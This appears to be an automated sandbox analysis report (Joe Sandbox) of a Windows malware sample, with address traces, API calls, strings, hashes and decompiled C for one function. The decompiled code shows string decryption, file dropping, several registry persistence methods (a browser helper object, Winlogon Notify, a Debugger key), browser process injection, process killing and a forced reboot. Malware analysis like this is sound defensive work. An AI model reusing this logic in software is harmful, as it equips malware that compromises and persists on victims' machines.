0x00000000
0x00404c16
0x00404938
0x00404940
0x00404945
0x0040494b
0x00404950
0x00404951
0x00404956
0x00404957
0x0040495c
0x00404961
0x00404961
0x00404966
0x00000000
0x00000000
0x00404968
0x0040496b
0x0040496b
0x00404977
0x0040497c
0x00404983
0x00404985
0x004049a5
0x00404987
0x0040498d
0x00404999
0x00404999
0x004049af
0x004049b7
0x004049cf
0x004049d4
0x004049db
0x004049dd
0x00404b6f
0x00404b76
0x00404b88
0x00000000
0x004049e3
0x004049e3
0x004049e6
0x00000000
0x00000000
0x00404a01
0x00404a06
0x00404a0b
0x00404a0f
0x00404a11
0x00404a13
0x00404a13
0x00404a1b
0x00404a20
0x00404a25
0x00404a27
0x00404a29
0x00404a2d
0x00404a30
0x00404a30
0x00404a32
0x00000000
0x00000000
0x00404a39
0x00404a3b
0x00404a3c
0x00404a3e
0x00404a3f
0x00404a3f
0x00404a44
0x00404a4b
0x00404a4e
0x00404a4f
0x00404a54
0x00404a5b
0x00404a5d
0x00404a64
0x00404a66
0x00404a67
0x00404a6b
0x00404a6b
0x00404a6f
0x00404a7a
0x00404a7d
0x00404a81
0x00404a83
0x00404a84
0x00404a89
0x00404a8c
0x00404a8c
0x00404a8e
0x00000000
0x00000000
0x00404a95
0x00404a97
0x00404a98
0x00404a98
0x00404a98
0x00404ab4
0x00404abb
0x00404ac0
0x00404ac5
0x00404ae6
0x00404ae6
0x00404af2
0x00404b06
0x00404b0e
0x00404b1a
0x00404b1f
0x00404b44
0x00404b49
0x00404b4a
0x00404b4f
0x00404b4f
0x00404b62
0x00404b67
0x00000000
0x00404b67
0x004049dd
0x004047e7
0x004047ef
0x00404805
0x00404806
0x0040480d
0x0040480e
0x00404823
0x00404823
0x0040482a
0x0040482b
0x00404830
0x00404833
0x00000000
0x00000000
0x00404815
0x0040481c
0x0040481d
0x0040481e
0x0040481e
0x00000000
0x00404823
0x00000000
0x004047ef
0x0040458d
0x00404592
0x00404594
0x00000000
0x00000000
0x0040459f
0x004045a7
0x004045ac
0x004045b2
0x004045b7
0x004045b8
0x004045bd
0x004045be
0x004045c3
0x004045c8
0x004045c8
0x004045cd
0x00000000
0x00000000
0x004045cf
0x004045d2
0x004045d2
0x004045de
0x004045e3
0x004045ea
0x004045ec
0x0040460c
0x004045ee
0x004045f4
0x00404600
0x00404600
0x00404616
0x0040461e
0x00404636
0x0040463b
0x00404642
0x00404644
0x004047bd
0x004047c4
0x00000000
0x0040464a
0x0040464a
0x0040464d
0x00000000
0x00000000
0x00404668
0x0040466d
0x00404672
0x00404676
0x00404678
0x0040467a
0x0040467a
0x00404682
0x00404687
0x0040468c
0x0040468e
0x00404690
0x00404694
0x00404697
0x00404697
0x00404699
0x00000000
0x00000000
0x004046a0
0x004046a2
0x004046a3
0x004046a5
0x004046a6
0x004046a6
0x004046ab
0x004046b2
0x004046b5
0x004046b6
0x004046bb
0x004046c2
0x004046c4
0x004046cb
0x004046cd
0x004046ce
0x004046d2
0x004046d2
0x004046d6
0x004046e1
0x004046e4
0x004046e8
0x004046ea
0x004046eb
0x004046f0
0x004046f3
0x004046f3
0x004046f5
0x00000000
0x00000000
0x004046fc
0x004046fe
0x004046ff
0x004046ff
0x004046ff
0x0040471b
0x00404722
0x00404727
0x0040472c
0x0040474d
0x0040474d
0x00404759
0x0040476d
0x00404775
0x00404786
0x00404792
0x00404797
0x00404798
0x0040479d
0x0040479d
0x004047b0
0x004047b5
0x00000000
0x004047b5
0x00404644
0x004044d6
0x004044d9
0x00000000
0x00000000
0x004044e3
0x004044ea
0x00404504
0x00404510
0x00000000
0x00404302
0x00404307
0x0040430f
0x00404314
0x0040431a
0x0040431f
0x00404320
0x00404326
0x0040432b
0x00404336
0x0040433b
0x0040433d
0x004043b6
0x004043b6
0x004043bb
0x004043d4
0x004043d9
0x004043db
0x004043dd
0x004043df
0x004043e2
0x004043eb
0x00404402
0x00404408
0x00404408
0x004043e2
0x004043dd
0x0040440d
0x00404412
0x0040442b
0x00404430
0x00404432
0x00404434
0x00404436
0x00404439
0x00404454
0x0040445a
0x0040445a
0x00404439
0x00404434
0x00404461
0x00404469
0x00404472
0x00404477
0x0040447f
0x0040448b
0x0040448c
0x0040448d
0x0040448f
0x00404491
0x00404493
0x00404495
0x00404497
0x00404499
0x0040449b
0x0040449c
0x004044a1
0x004044a3
0x004044a8
0x004044a8
0x00000000
0x004044a8
0x0040433f
0x00404344
0x00404345
0x0040434b
0x00404350
0x00404358
0x0040435e
0x00404364
0x00404369
0x0040436b
0x0040437a
0x0040437a
0x0040437f
0x00404380
0x00404386
0x0040438c
0x00404392
0x00404398
0x0040439d
0x0040439f
0x00000000
0x00000000
0x004043a9
0x004043ae
0x004043b0
0x00000000
0x00000000
0x00000000
0x004043b0
0x00404371
0x00404376
0x00404378
0x00000000
0x00000000
0x00000000
0x00404378
0x004042fc
0x0040401a
0x0040401f
0x00404025
0x0040405a
0x0040405a
0x0040405f
0x0040406a
0x00404074
0x00404074
0x00404077
0x0040407c
0x0040407c
0x0040407e
0x00000000
0x00000000
0x00404080
0x00404087
0x004040da
0x004040e3
0x00000000
0x004040e3
0x00404089
0x00404096
0x0040409b
0x0040409c
0x0040409e
0x004040a3
0x004040a5
0x004040b6
0x004040c4
0x004040c9
0x004040d0
0x004040d2
0x00000000
0x00000000
0x004040d4
0x004040d5
0x004040d8
0x00000000
0x00000000
0x00000000
0x004040d8
0x004040a7
0x004040ac
0x004040ad
0x004040b2
0x004040b4
0x00000000
0x00000000
0x00000000
0x004040b4
0x004040eb
0x004040eb
0x004040ed
0x004040ed
0x0040410e
0x0040410e
0x00404110
0x0040411b
0x0040411c
0x00000000
0x0040411c
0x00404123
0x00404123
0x00404124
0x0040410c
0x0040410c
0x0040410c
0x00000000
0x00404126
0x00404126
0x00404126
0x00404126
0x00404128
0x00404128
0x0040412a
0x0040414c
0x00404151
0x00404158
0x00404160
0x00404166
0x00404166
0x00000000
0x0040412c
0x00404138
0x00404144
0x00404145
0x00000000
0x00404145
0x0040412a
0x004040f2
0x004040f2
0x004040f4
0x00404107
0x00000000
0x004040f6
0x004040ff
0x00404100
0x00000000
0x00404100
0x00404027
0x0040402d
0x00404036
0x0040403b
0x00404042
0x00404049
0x0040404b
0x00404055
0x00404057
0x00000000
0x00404057
0x00000000
0x0040404b
0x00404025
0x00403ffa

APIs

wsprintfA.USER32 ref: 00403FC0
CreateMutexA.KERNEL32(00408778,00000001,qnd_b__-12,00408816,%02X,00000001,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,wininet.dll,iphlpapi.dll), ref: 00403FD1
GetLastError.KERNEL32 ref: 00403FE5
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00404004
RegDeleteValueA.ADVAPI32(00000000,SubshellState,00000002,00000000), ref: 0040402D
RegCloseKey.ADVAPI32(?,00000000,SubshellState,00000002,00000000), ref: 00404036
GetCurrentProcessId.KERNEL32(00000002,00000000), ref: 0040405A
Process32First.KERNEL32(00000000,00000128), ref: 00404077
lstrcmpi.KERNEL32 ref: 0040409E
lstrcmpi.KERNEL32 ref: 004040AD
OpenProcess.KERNEL32(00100201,00000000,?,00000000,00000000,00000128,00000000,00000128), ref: 004040C4
Process32Next.KERNEL32 ref: 004040E3
CloseHandle.KERNEL32(00000000,00000000,00000128), ref: 004040ED
SetPriorityClass.KERNEL32(?,00000040,00000000,00000000,00000128), ref: 00404100
TerminateProcess.KERNEL32(?,00000000,00000000,00000000,00000128), ref: 0040411C
WaitForSingleObject.KERNEL32(?,00001388,00000000,00000000,00000128), ref: 00404138
CloseHandle.KERNEL32(?,?,00001388,00000000,00000000,00000128), ref: 00404145
SetFileAttributesA.KERNEL32(?,00000080,00000000,00000000,00000128), ref: 00404160
DeleteFileA.KERNEL32(?,?,00000080,00000000,00000000,00000128), ref: 00404166
RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00020019,?,00000002,00000000), ref: 0040418F
RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00020019,?,00000002,00000000), ref: 004041C8
RegQueryValueExA.ADVAPI32(?,Default Flags,00000000,00000000,00412190,00000012), ref: 004041F9
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,?,Default Flags,00000000,00000000,00412190,00000012), ref: 00404219
RegCloseKey.ADVAPI32(?,?,Default Flags,00000000,00000000,00412190,00000012), ref: 00404231
RegDeleteKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy), ref: 00404247
RegCloseKey.ADVAPI32(?,80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00020019,?,00000002), ref: 00404253
CloseHandle.KERNEL32(?,00000000), ref: 00404279

Strings

qnd_b__-12, xrefs: 00403FC5
SubshellState, xrefs: 00404027
Default Flags, xrefs: 004041ED, 0040420D
winrnt.exe, xrefs: 004040A7
%02X, xrefs: 00403FB6
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy, xrefs: 00404185, 004041BE, 0040423D

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: Close$CreateDeleteHandleProcessValue$FileOpenProcess32lstrcmpi$AttributesClassCurrentErrorFirstLastMutexNextObjectPriorityQuerySingleSnapshotTerminateToolhelp32Waitwsprintf
String ID: %02X$Default Flags$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy$SubshellState$qnd_b__-12$winrnt.exe
API String ID: 3062393105-304649281
Opcode ID: eee3c27dcf5dac9c62056781aded1b19a19737c96418b25252549f2c20911ed1
Instruction ID: 2881faae1f31a76db2ea66fcd2952da1024c90796d993c2c27515e308abc8ee4
Opcode Fuzzy Hash: eee3c27dcf5dac9c62056781aded1b19a19737c96418b25252549f2c20911ed1
Instruction Fuzzy Hash: 5151E4B0284701B9E631BB218D46FAF7699AFD0709F60483FB785750C2DABC94508A5F

Uniqueness

Uniqueness Score: -1.00%

Function 004042A2 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 156
stringfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E004042A2() {
				void* _t361;
				void* _t363;
				char* _t368;
				int _t371;
				signed char* _t390;
				int _t393;
				void* _t395;
				int _t396;
				int _t397;
				void* _t401;
				int _t402;
				int _t403;
				CHAR* _t406;
				int _t408;
				long _t409;
				CHAR* _t410;
				int _t412;
				long _t413;
				CHAR* _t418;
				void* _t420;
				CHAR* _t421;
				void* _t423;
				char* _t433;
				int _t434;
				signed char* _t439;
				int _t442;
				int _t443;
				int _t449;
				int _t450;
				int _t455;
				int _t460;
				int _t462;
				void* _t464;
				int _t468;
				void* _t470;
				int _t475;
				long _t479;
				int _t480;
				int _t486;
				int _t488;
				int _t491;
				int _t498;
				int _t500;
				int _t502;
				int _t507;
				int _t510;
				int _t512;
				int _t515;
				int _t517;
				void* _t521;
				int _t526;
				int _t528;
				int _t530;
				int _t534;
				void* _t535;
				void* _t537;
				char* _t538;
				char* _t539;
				int _t540;
				char* _t541;
				char* _t542;
				char* _t543;
				char* _t544;
				char* _t545;
				int _t546;
				char* _t547;
				int _t548;
				char* _t550;
				CHAR* _t551;
				int _t555;
				int _t557;
				int _t560;
				void* _t574;
				int _t575;
				int _t578;
				CHAR* _t584;
				int _t586;
				long _t587;
				int _t592;
				int _t600;
				int _t601;
				signed char _t609;
				int _t615;
				int _t619;
				void* _t621;
				int _t622;
				void* _t625;
				signed char _t636;
				int _t637;
				signed char* _t638;
				void* _t639;
				void* _t641;
				int _t646;
				void* _t648;
				void* _t649;
				long* _t650;
				signed int* _t653;
				long _t663;
				int _t664;
				signed char _t674;
				void* _t677;
				int _t679;
				int _t680;
				CHAR* _t681;
				void* _t682;
				void* _t684;
				int _t687;
				void* _t689;
				void* _t690;
				void* _t691;
				signed int* _t694;
				void* _t703;
				int _t704;
				signed char _t714;
				int _t722;
				CHAR* _t724;
				void* _t730;
				void* _t737;
				CHAR* _t742;
				CHAR* _t752;
				CHAR* _t753;
				char* _t754;
				CHAR* _t755;
				CHAR* _t756;
				CHAR* _t757;
				CHAR* _t758;
				CHAR* _t759;
				CHAR* _t760;
				CHAR* _t761;
				long* _t762;
				void** _t763;
				char* _t764;
				char* _t765;
				CHAR* _t766;
				int _t769;
				char* _t770;
				char* _t772;
				char* _t773;
				char* _t774;
				long* _t775;
				CHAR* _t776;
				int _t777;
				CHAR* _t778;
				CHAR* _t779;
				void* _t780;
				signed int* _t782;
				char* _t783;
				void* _t784;
				CHAR* _t785;
				CHAR* _t786;
				void* _t787;
				signed int* _t789;
				char* _t790;
				CHAR* _t791;
				struct _STARTUPINFOA* _t792;
				void* _t793;
				void* _t794;
				signed char _t795;
				long* _t799;
				long* _t800;
				int _t801;
				void* _t803;
				long _t804;
				long _t805;
				void* _t806;
				signed int* _t830;
				signed char* _t831;
				signed char* _t832;
				signed int* _t834;
				signed int* _t837;
				char* _t842;
				signed char* _t843;
				void* _t844;
				void* _t845;
				long _t846;
				signed int* _t847;
				void** _t848;
				int _t850;
				void** _t851;
				void** _t852;
				char* _t853;
				CHAR* _t854;
				signed char* _t855;
				long* _t856;
				signed int* _t857;
				void* _t858;
				void* _t859;
				char* _t860;
				signed int* _t861;
				void* _t862;
				char* _t863;
				signed int* _t864;
				CHAR* _t866;
				long _t867;
				struct _FILETIME* _t868;
				void* _t869;
				long* _t870;

				_t361 = CreateFileA(_t752, 0x80000000, 1, 0, 3, 0, 0); // executed
				 *(_t869 + 0xa0) = _t361;
				_t803 = _t361;
				if(_t361 != 0xffffffff) {
					GetFileTime(_t803, _t869 + 0x84, _t869 + 0x88, _t869 + 0x8c);
					CloseHandle( *(_t869 + 0xa0));
					 *(_t869 + 0xc) = 1;
				}
				if( *((intOrPtr*)(_t869 + 0x1c)) != 0) {
					L20:
					_t363 = CreateFileA(_t869 + 0x1580, 0x80000000, 1, 0, 3, 0, 0);
					 *(_t869 + 0xa0) = _t363;
					if(_t363 == 0 || _t363 == 0xffffffff) {
						 *(_t869 + 0x14) = 0;
						_t867 = 0;
						__eflags = 0;
					} else {
						_t867 = GetFileSize(_t363, 0);
						 *(_t869 + 0x14) = E00401000(_t717);
						ReadFile( *(_t869 + 0xb0),  *(_t869 + 0x20), _t867, _t869 + 0xa0, 0);
						CloseHandle( *(_t869 + 0xa0));
					}
					CloseHandle(CreateThread(0, 0x1000, E00401038, _t869 + 0x1570, 0, _t869 + 0x9c));
					_t368 = 0x408720;
					while(_t368 < 0x408776) {
						 *_t368 =  *_t368 ^ 0x000000d4;
						_t368 =  &(_t368[1]);
					}
					while(1) {
						__eflags = 0x407b20 - 0x408720;
						if(0x407b20 >= 0x408720) {
							break;
						}
						 *0x407b20 =  *0x407b20 ^ 0x0000004d;
						__eflags =  *0x407b20;
						 *(_t867 + 0x40) =  *(_t867 + 0x40) ^ _t795;
					}
					__eflags =  *0x412100 - 2;
					if( *0x412100 != 2) {
						L56:
						 *(_t869 + 0x78) = 0x10;
						_t753 = _t869 + 0x1ec;
						_t371 = GetComputerNameA(_t753, _t869 + 0x78);
						__eflags = _t371;
						if(_t371 == 0) {
							L58:
							_push("QlC5hT0yHn63XEm5LqJ2OxSkGj2v");
							_push(_t869 + 0x1bc);
							L00405E20();
							L62:
							wsprintfA(0x4122b0, "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}",  *((char*)(_t869 + 0x1f4)),  *((char*)(_t869 + 0x1f1)),  *((char*)(_t869 + 0x1ee)),  *((char*)(_t869 + 0x1eb)),  *((char*)(_t869 + 0x1e8)),  *((char*)(_t869 + 0x1e5)),  *((char*)(_t869 + 0x1e2)),  *((char*)(_t869 + 0x1df)),  *((char*)(_t869 + 0x1dc)),  *((char*)(_t869 + 0x1d9)),  *((char*)(_t869 + 0x1d6)),  *((char*)(_t869 + 0x1d3)),  *((char*)(_t869 + 0x1d0)),  *((char*)(_t869 + 0x1cd)),  *((char*)(_t869 + 0x1ca)),  *((char*)(_t869 + 0x1c7)));
							_t870 = _t869 + 0x48;
							_t390 = 0x407aa0;
							while(1) {
								__eflags = _t390 - 0x407ad5;
								if(_t390 >= 0x407ad5) {
									break;
								}
								 *_t390 =  *_t390 ^ 0x000000d4;
								_t390 =  &(_t390[1]);
							}
							while(1) {
								__eflags = 0x4072a0 - 0x407aa0;
								if(0x4072a0 >= 0x407aa0) {
									break;
								}
								 *0x4072a0 =  *0x4072a0 ^ 0x0000004d;
								__eflags =  *0x4072a0;
								 *(_t867 + 0x40) =  *(_t867 + 0x40) ^ _t795;
							}
							_push(0x4122b0);
							_push(0x407aa0);
							_t754 =  &(_t870[0x410]);
							_push(_t754);
							L00405E20();
							_push(0x4072a0);
							L00405E30();
							_t393 = RegCreateKeyA(0x80000002, _t754,  &(_t870[0x26]));
							__eflags = _t393;
							if(_t393 != 0) {
								L93:
								_t395 = E004030DE( &(_t870[0x1ee]));
								_t870[0x26] = _t395;
								__eflags = _t395;
								if(_t395 == 0) {
									L113:
									_t396 = E004010B2();
									__eflags = _t396;
									_t804 = _t396;
									if(_t396 == 0) {
										_t804 = 0x42;
									}
									_t870[0x1ee] = _t804;
									_t397 = E004010B2();
									__eflags = _t397;
									_t805 = _t397;
									if(_t397 == 0) {
										_t805 = 0x4d;
									}
									_t870[0x162] = _t805;
									_push( *0x4120b0);
									_push( &(_t870[0x163]));
									L00405E20();
									_push( &(_t870[0x55a]));
									_push( &(_t870[0x1ac]));
									L00405E20();
									_t847 = _t870[5];
									_t401 = _t847 + _t867;
									while(1) {
										__eflags = _t847 - _t401;
										if(_t847 >= _t401) {
											break;
										}
										 *_t847 =  *_t847 ^ _t870[0x162] & 0x000000ff;
										_t847 =  &(_t847[0]);
										_t401 = _t870[5] + _t867;
									}
									_t755 =  &(_t870[0x517]);
									_t402 = ExpandEnvironmentStringsA("%AppData%\\", _t755, 0x104);
									__eflags = _t402;
									if(_t402 == 0) {
										L124:
										_t756 =  &(_t870[0x516]);
										_t403 = GetTempPathA(0x104, _t756);
										__eflags = _t403;
										if(_t403 == 0) {
											L132:
											E00401029(_t870[5]);
											_t757 =  &(_t870[0x387]);
											_t406 = GetSystemDirectoryA(_t757, 0x104);
											_push(0x80);
											_push( *0x4120c0);
											_push(0x41103e);
											_push(_t757);
											L00405E30();
											L00405E30();
											SetFileAttributesA(_t406, _t406);
											_t408 = CreateFileA(_t757, 0x40000000, 0, 0, 2, 0x80, 0);
											_t870[0x28] = _t408;
											__eflags = _t408;
											if(_t408 == 0) {
												L139:
												_t409 = GetLastError();
												__eflags = _t409 - 0x20;
												if(_t409 != 0x20) {
													_t758 =  &(_t870[0x387]);
													_t410 = ExpandEnvironmentStringsA("%AppData%\\", _t758, 0x104);
													_push(0x80);
													_push( *0x4120c0);
													L00405E30();
													SetFileAttributesA(_t410, _t758);
													_t412 = CreateFileA(_t758, 0x40000000, 0, 0, 2, 0x80, 0);
													_t870[0x28] = _t412;
													__eflags = _t412;
													if(_t412 == 0) {
														L143:
														_t413 = GetLastError();
														__eflags = _t413 - 0x20;
														if(_t413 == 0x20) {
															goto L140;
														}
														_t584 = GetTempPathA(0x104, _t758);
														_push(0x80);
														_push( *0x4120c0);
														L00405E30();
														SetFileAttributesA(_t584, _t758);
														_t586 = CreateFileA(_t758, 0x40000000, 0, 0, 2, 0x80, 0);
														_t870[0x28] = _t586;
														__eflags = _t586;
														if(_t586 == 0) {
															L146:
															_t587 = GetLastError();
															__eflags = _t587 - 0x20;
															if(_t587 == 0x20) {
																goto L140;
															}
															L149:
															_t759 =  &(_t870[0x343]);
															_t418 = ExpandEnvironmentStringsA("%AppData%\\", _t759, 0x104);
															_push(0x80);
															_push( *0x4120d0);
															L00405E30();
															SetFileAttributesA(_t418, _t759);
															_t420 = CreateFileA(_t759, 0x40000000, 0, 0, 2, 0x80, 0);
															_t870[0x28] = _t420;
															__eflags = _t420;
															_t806 = _t420;
															if(_t420 == 0) {
																L151:
																_t760 =  &(_t870[0x342]);
																_t421 = GetTempPathA(0x104, _t760);
																_push(0x80);
																_push( *0x4120d0);
																L00405E30();
																SetFileAttributesA(_t421, _t760);
																_t423 = CreateFileA(_t760, 0x40000000, 0, 0, 2, 0x80, 0);
																_t870[0x28] = _t423;
																__eflags = _t423;
																_t806 = _t423;
																if(_t423 == 0) {
																	L154:
																	_t870[0x342] = 0;
																	L155:
																	__eflags = _t870[0x342];
																	if(_t870[0x342] != 0) {
																		CreateFileA( &(_t870[0x348]), 0x80000000, 1, 0, 3, 0, 0);
																	}
																	_t761 =  &(_t870[0x2b]);
																	GetSystemDirectoryA(_t761, 0x104);
																	_push(0x41103e);
																	_push(_t761);
																	L00405E30();
																	E004012C2(_t761);
																	ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t761, 0x104);
																	E004012C2(_t761);
																	ExpandEnvironmentStringsA("%AppData%\\", _t761, 0x104);
																	E004012C2(_t761);
																	_t433 = 0x407220;
																	while(1) {
																		__eflags = _t433 - 0x40724d;
																		if(_t433 >= 0x40724d) {
																			break;
																		}
																		 *_t433 =  *_t433 ^ 0x000000d4;
																		_t433 =  &(_t433[1]);
																	}
																	_t434 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006,  &(_t870[0x26]));
																	__eflags = _t434;
																	if(_t434 == 0) {
																		L162:
																		__eflags = _t870[0xb];
																		if(_t870[0xb] == 0) {
																			_t774 =  &(_t870[0x55a]);
																			_t574 = E00401251(_t870[0x26]);
																			_push(_t774);
																			L00405E40();
																			_t575 = _t574 + 1;
																			__eflags = _t575;
																			RegSetValueExA(_t870[0x2b],  *0x4120b0, 0, 1, _t774, _t575);
																		}
																		RegDeleteValueA(_t870[0x27], "winrnt.exe");
																		RegCloseKey(_t870[0x26]);
																		L165:
																		__eflags =  *0x412100 - 2;
																		if( *0x412100 != 2) {
																			L205:
																			CloseHandle(CreateThread(0, 0x10000, E0040265F, 2, 0,  &(_t870[0x27])));
																			_t439 = 0x407000;
																			while(1) {
																				__eflags = _t439 - 0x407060;
																				if(_t439 >= 0x407060) {
																					break;
																				}
																				 *_t439 =  *_t439 ^ 0x000000d4;
																				_t439 =  &(_t439[1]);
																			}
																			_t870[0xc] = 0;
																			while(1) {
																				E004011CF(0x80000002, 0x407000);
																				__eflags = _t870[0xc] - 9;
																				if(_t870[0xc] <= 9) {
																					goto L244;
																				}
																				_t870[0x16] = 0;
																				_t870[0x17] = 0;
																				_t498 = E004025C3();
																				__eflags = _t498;
																				if(_t498 != 0) {
																					L241:
																					 *_t870 = 0;
																					L245:
																					_t870[0xd] = 0x3b;
																					do {
																						__eflags = _t870[0x342];
																						if(_t870[0x342] != 0) {
																							_push(0);
																							_push("opera.exe");
																							_push("seamonkey.exe");
																							_push("mozilla.exe");
																							_push("firefox.exe");
																							_push("iexplore.exe");
																							_push("explorer.exe");
																							E0040318D( &(_t870[0x349]));
																							_t870 =  &(_t870[8]);
																						}
																						__eflags = _t870[0xa];
																						if(_t870[0xa] != 0) {
																							_t765 =  &(_t870[0x3cb]);
																							SetFileAttributesA(_t765, 0x21);
																							_t475 = RegCreateKeyA(0x80000002,  &(_t870[0x40f]),  &(_t870[0x26]));
																							__eflags = _t475;
																							if(_t475 == 0) {
																								E00401251(_t870[0x26]);
																								_t870[0x27] = 1;
																								_t479 = RegSetValueExA(_t870[0x2b], "IsInstalled", 0, 4,  &(_t870[0x28]), 4);
																								_push(_t765);
																								L00405E40();
																								_t480 = _t479 + 1;
																								__eflags = _t480;
																								RegSetValueExA(_t870[0x2b], "StubPath", 0, 1, _t765, _t480);
																								RegCloseKey(_t870[0x26]);
																							}
																						}
																						__eflags = _t870[0xb];
																						_t848 =  &(_t870[0x26]);
																						if(_t870[0xb] == 0) {
																							_t442 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006, _t848);
																							__eflags = _t442;
																							if(_t442 == 0) {
																								L256:
																								_t762 =  &(_t870[0x55a]);
																								_push(_t762);
																								L00405E40();
																								_t443 = _t442 + 1;
																								__eflags = _t443;
																								_push(_t443);
																								_push(_t762);
																								_push(1);
																								_push(0);
																								_push( *0x4120b0);
																								goto L257;
																							}
																							_t442 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006, _t848);
																							__eflags = _t442;
																							if(_t442 != 0) {
																								goto L258;
																							}
																							goto L256;
																						} else {
																							_t766 =  &(_t870[0x48f]);
																							SetFileAttributesA(_t766, 0x21);
																							_t449 = RegCreateKeyA(0x80000002, 0x408720, _t848);
																							__eflags = _t449;
																							if(_t449 != 0) {
																								L258:
																								__eflags = _t870[9];
																								if(_t870[9] == 0) {
																									goto L268;
																								}
																								_t763 =  &(_t870[0x27]);
																								_t450 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t763, 0);
																								__eflags = _t450;
																								if(_t450 == 0) {
																									L261:
																									RegSetValueExA(_t870[0x2b], "SubshellState", 0, 3,  &(_t870[0x1ef]), 0x22a);
																									RegCloseKey(_t870[0x26]);
																									L262:
																									_t764 =  &(_t870[0x387]);
																									SetFileAttributesA(_t764, 0x21);
																									__eflags =  *0x412100 - 2;
																									_t851 =  &(_t870[0x26]);
																									if( *0x412100 != 2) {
																										_t455 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t851);
																										__eflags = _t455;
																										if(_t455 != 0) {
																											goto L268;
																										}
																										_push(_t764);
																										L00405E40();
																										RegSetValueExA(_t870[0x2b], 0, 0, 1, _t764, _t455 + 1);
																										RegSetValueExA(_t870[0x2b], "ThreadingModel", 0, 1, "Both", 5);
																										RegCloseKey(_t870[0x26]);
																										_t460 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t851);
																										__eflags = _t460;
																										if(_t460 != 0) {
																											goto L268;
																										}
																										L267:
																										RegCloseKey(_t870[0x26]);
																										goto L268;
																									}
																									_t462 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}", _t851);
																									__eflags = _t462;
																									if(_t462 != 0) {
																										goto L268;
																									}
																									_t464 = E00401251(_t870[0x26]);
																									_push(_t764);
																									L00405E40();
																									RegSetValueExA(_t870[0x2b], "DLLName", 0, 1, _t764, _t464 + 1);
																									RegSetValueExA(_t870[0x2b], "Startup", 0, 1, "Startup", 8);
																									goto L267;
																								}
																								_t468 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t763, 0);
																								__eflags = _t468;
																								if(_t468 != 0) {
																									goto L262;
																								}
																								goto L261;
																							}
																							_t470 = E00401251(_t870[0x26]);
																							_push(_t766);
																							L00405E40();
																							_push(_t470 + 1);
																							_push(_t766);
																							_push(1);
																							_push(0);
																							_push("Debugger");
																							L257:
																							RegSetValueExA(_t870[0x2b], ??, ??, ??, ??, ??);
																							RegCloseKey(_t870[0x26]);
																							goto L258;
																						}
																						L268:
																						SetFileAttributesA( &(_t870[0x55b]), 0x21);
																						Sleep(0x3e8);
																						_t348 =  &(_t870[0xd]);
																						 *_t348 = _t870[0xd] - 1;
																						__eflags =  *_t348;
																					} while ( *_t348 >= 0);
																					_t486 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &(_t870[0x12]), 0);
																					__eflags = _t486;
																					if(_t486 == 0) {
																						_t870[0x10] = 4;
																						_t770 =  &(_t870[0x10]);
																						_t488 = RegQueryValueExA(_t870[0x16], "g00d d0gg", 0, 0, _t770,  &(_t870[0x10]));
																						__eflags = _t488;
																						if(_t488 == 0) {
																							_t491 = _t870[0xf] - 1;
																							__eflags = _t491;
																							_t870[0xf] = _t491;
																							if(_t491 == 0) {
																								RegDeleteValueA(_t870[0x12], "g00d d0gg");
																								Sleep(0x1388);
																								__eflags =  *0x412100 - 2;
																								if( *0x412100 != 2) {
																									ExitWindowsEx(6, 0);
																								} else {
																									RtlAdjustPrivilege(0x13, 1, 0,  &(_t870[0xe]));
																									 *0x412240(1);
																								}
